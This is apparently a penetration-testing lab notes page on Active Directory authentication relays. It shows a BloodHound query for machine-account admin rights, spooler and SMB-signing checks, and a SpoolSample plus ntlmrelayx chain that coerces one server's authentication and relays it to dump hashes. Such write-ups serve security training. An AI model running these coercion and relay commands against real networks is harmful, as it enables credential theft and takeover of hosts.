Skip to main content

Automated Relays

If Possible The Target System Should Be Enumerated Using Bloodhound

All Windows hosts have a Machine Account. This is the User Account associated with the Machine. Unless someone tampered with the Account of the Host, the Passwords of these Accounts are Uncrackable.

In AD, these Machine Accounts are used in different Services. Different Domain Controllers use their Machine Accounts to Synchronize AD Updates and changes. When you request a Certificate on behalf of the Host you are working on, the Machine Account of that Host is used for Authentication to the AD Certificate Service.

There is an exceptional case in AD, where one Machine has Administrator rights over another Machine. Essentially in the AD Configuration, Administrative Permissions over a Host have been granted to another Host.


Bloodhound

Scenario

We are on ADOBE-SERVER-1 with Tier 1 Admin Privileges.

Bloodhound shows us that the ADOBE-SERVER-2 machine account has Administrative Privileges over the ADOBE-SERVER-1 Machine.


We need to Identify cases where a Machine Account has Administrative Access over another Machine, we can use Bloodhound to accomplish this Task.

:: This Query will attempt to find Instances where a Computer has the [AdminTo] Relationship over another Computer
MATCH p=(c1:Computer)-[r1:MemberOf*1..]->(g:Group)-[r2:AdminTo]->(n:Computer) RETURN p

The Printer Bug

Required Privileges: Administrators

The Printer Bug is a "Feature" of the MS-RPRN Protocol (PrintSystem Remote Protocol), which allows a Domain User to Remotely force a Target Host running the Print Spooler Service to Authenticate to an arbitrary IP Address.


  • To Exploit it apart from Administrative Privileges we need to meet the Following Conditions:
    • Valid set of AD Account Credentials
    • Network Connectivity to the target's SMB Service
    • The Target Host must be running the Print Spooler service
    • The Hosts must Not have SMB Signing Enforced


We need to Determine if the Print Spooler Service is Running. Since we don't have access to ADOBE-SERVER-2, we need to Query from the Network Perspective.

In this case, we can use a WMI Query from our Session to Query the Service current State. The Commands Below can be used to verify that the Service is Running.

GWMI Win32_Printer -Computer ADOBE-SERVER-2.za.adobe.loc
Get-PrinterPort -ComputerName ADOBE-SERVER-2.za.adobe.loc


SMB Signing

In order to Relay the Coerced Authentication attempt, SMB Signing should not be Enforced.

nmap --script=smb2-security-mode -p445 ADOBE-SERVER-1.za.adobe.loc ADOBE-SERVER-2.za.adobe.loc


Exploiting Authentication Relays

Note: This attack can be Unstable

Abusing the Print Spooler Service may cause it to Crash, and a Callback is not always Guaranteed.


SpoolSample can be used to Exploit Authentication Relays. The Exploit should be Compiled and Transferred to the Target Machine.


We will use SpoolSample to coerce ADOBE-SERVER-2 to Authenticate to us on the Target Windows Machine and then use NTLMRelayx to Relay the Authentication attempt to ADOBE-SERVER-1.

When ADOBE-SERVER-2 makes the Authentication attempt on ADOBE-SERVER-1 we will Receive a HASH Dump if no Command was Specified.


:: Commands can be specified with [-c]
ntlmrelayx -smb2support -t smb://ADOBE-SERVER-1 -debug